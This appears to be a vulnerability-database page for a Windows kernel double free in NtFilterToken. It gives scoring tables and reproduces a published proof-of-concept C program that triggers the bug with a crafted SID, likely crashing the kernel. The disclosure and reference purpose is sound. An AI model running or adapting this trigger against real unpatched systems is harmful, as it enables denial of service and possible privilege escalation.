CPE, which stands for Common Platform Enumeration, is a standardized scheme for naming hardware, software, and operating systems. CPE provides a structured naming scheme to uniquely identify and classify information technology systems, platforms, and packages based on certain attributes such as vendor, product name, version, update, edition, and language.
CWE, or Common Weakness Enumeration, is a comprehensive list and categorization of software weaknesses and vulnerabilities. It serves as a common language for describing software security weaknesses in architecture, design, code, or implementation that can lead to vulnerabilities.
CAPEC, which stands for Common Attack Pattern Enumeration and Classification, is a comprehensive, publicly available resource that documents common patterns of attack employed by adversaries in cyber attacks. This knowledge base aims to understand and articulate common vulnerabilities and the methods attackers use to exploit them.
Services & Price
Help & Info
Search : CVE id, CWE id, CAPEC id, vendor or keywords in CVE
Double free vulnerability in the kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows local users to gain privileges via a crafted application, aka "Windows Kernel Double Free Vulnerability."
CVE Informations
Metrics
Metrics
Score
Severity
CVSS Vector
Source
V2
7.2
AV:L/AC:L/Au:N/C:C/I:C/A:C
nvd@nist.gov
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
2.12%
–
–
2022-03-13
–
–
2.12%
–
–
2022-04-03
–
–
2.12%
–
–
2022-06-19
–
–
2.12%
–
–
2022-11-13
–
–
2.12%
–
–
2022-11-20
–
–
2.12%
–
–
2022-12-25
–
–
2.12%
–
–
2023-01-01
–
–
2.12%
–
–
2023-02-19
–
–
2.12%
–
–
2023-03-12
–
–
–
0.04%
–
2024-06-02
–
–
–
0.04%
–
2024-12-22
–
–
–
0.04%
–
2025-02-23
–
–
–
0.04%
–
2025-01-19
–
–
–
0.04%
–
2025-02-23
–
–
–
0.04%
–
2025-03-18
–
–
–
–
0.59%
2025-03-30
–
–
–
–
0.51%
2025-04-15
–
–
–
–
0.51%
2025-04-15
–
–
–
–
0.51,%
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
// source: https://www.securityfocus.com/bid/38044/info
// Microsoft Windows is prone to a local privilege-escalation vulnerability that occurs in the kernel.
// An attacker can exploit this issue to execute arbitrary code with kernel-level privileges. Successful exploits will result in the complete compromise of affected computers. Failed exploit attempts will cause a denial of service.
// --------------------------------------------------------
// Windows NtFilterToken() Double Free Vulnerability
// ----------------------------- taviso@sdf.lonestar.org ------------
//
// INTRODUCTION
//
// NtFilterToken() will jump to a cleanup routine if it failed to capture
// the arguments specified due to pathological TOKEN_GROUP parameter. This
// cleanup routine assumes a pointer passed to SeCaptureSidAndAttributesArray()
// will be NULL if it fails, and attempts to release it otherwise.
//
// Unfortunately there is a codepath where SeCaptureSidAndAttributesArray()
// allocates a buffer, releases it on error, but then does not set it to
// NULL. This causes NtFilterToken() to incorrectly free it again.
//
// IMPACT
//
// This is probably exploitable (at least on MP kernels) to get ring0 code
// execution, but you would have to get the released buffer re-allocated
// during a very small window and you only get one attempt (the kernel
// will bugcheck if you dont win the race).
//
// Although technically this is a local privilege escalation, I don't think
// it's possible to create a reliable exploit. Therefore, It's probably
// safe to treat this as if it were a denial of service.
//
// Interestingly, Microsoft are big proponents of static analysis and this
// seems like a model example of a statically discoverable bug. I would
// guess they're dissapointed they missed this one, it would be fun to
// know what went wrong.
//
// This vulnerability was reported to Microsoft in October, 2009.
//
// CREDIT
//
// This bug was discovered by Tavis Ormandy <taviso@sdf.lonestar.org>.
//
#include <windows.h>
PVOID AllocBufferOnPageBoundary(ULONG Size);
int main(int argc, char **argv)
{
SID *Sid;
HANDLE NewToken;
FARPROC NtFilterToken;
PTOKEN_GROUPS Restricted;
// Resolve the required routine.
NtFilterToken = GetProcAddress(GetModuleHandle("NTDLL"), "NtFilterToken");
// Allocate SID such that touching the following byte will AV.
Sid = AllocBufferOnPageBoundary(sizeof(SID));
Restricted = AllocBufferOnPageBoundary(sizeof(PTOKEN_GROUPS) + sizeof(SID_AND_ATTRIBUTES));
// Setup SID, SubAuthorityCount is the important field.
Sid->Revision = SID_REVISION;
Sid->SubAuthority[0] = SECURITY_NULL_RID;
Sid->SubAuthorityCount = 2;
// Respect my authority.
CopyMemory(Sid->IdentifierAuthority.Value, "taviso", sizeof Sid->IdentifierAuthority.Value);
// Setup the TOKEN_GROUPS structure.
Restricted->Groups[0].Attributes = SE_GROUP_MANDATORY;
Restricted->Groups[0].Sid = Sid;
Restricted->GroupCount = 1;
// Trigger the vulnerabilty.
NtFilterToken(INVALID_HANDLE_VALUE,
0,
NULL,
NULL,
Restricted,
&NewToken);
// Not reached
return 0;
}
#ifndef PAGE_SIZE
# define PAGE_SIZE 0x1000
#endif
// This is a quick routine to allocate a buffer on a page boundary. Simply
// VirtualAlloc() two consecutive pages read/write, then use VirtualProtect()
// to set the second page to PAGE_NOACCESS.
//
// sizeof(buffer)
// |
// <-+->
// +----------------+----------------+
// | PAGE_READWRITE | PAGE_NOACCESS |
// +----------------+----------------+
// ^ ^
// | |
// buffer[0] -+ +- buffer[size]
//
// No error checking for simplicity, whatever :-)
//
PVOID AllocBufferOnPageBoundary(ULONG Size)
{
ULONG GuardBufSize;
ULONG ProtBits;
PBYTE GuardBuf;
// Round size requested up to the next multiple of PAGE_SIZE
GuardBufSize = (Size + (PAGE_SIZE - 1)) & ~(PAGE_SIZE - 1);
// Add one page to be the guard page
GuardBufSize = GuardBufSize + PAGE_SIZE;
// Map this anonymous memory
GuardBuf = VirtualAlloc(NULL,
GuardBufSize,
MEM_COMMIT | MEM_RESERVE,
PAGE_READWRITE);
// Make the final page NOACCESS
VirtualProtect(GuardBuf + GuardBufSize - PAGE_SIZE,
PAGE_SIZE,
PAGE_NOACCESS,
&ProtBits);
// Calculate where pointer should be, so that touching Buffer[Size] AVs.
return GuardBuf + GuardBufSize - PAGE_SIZE - Size;
}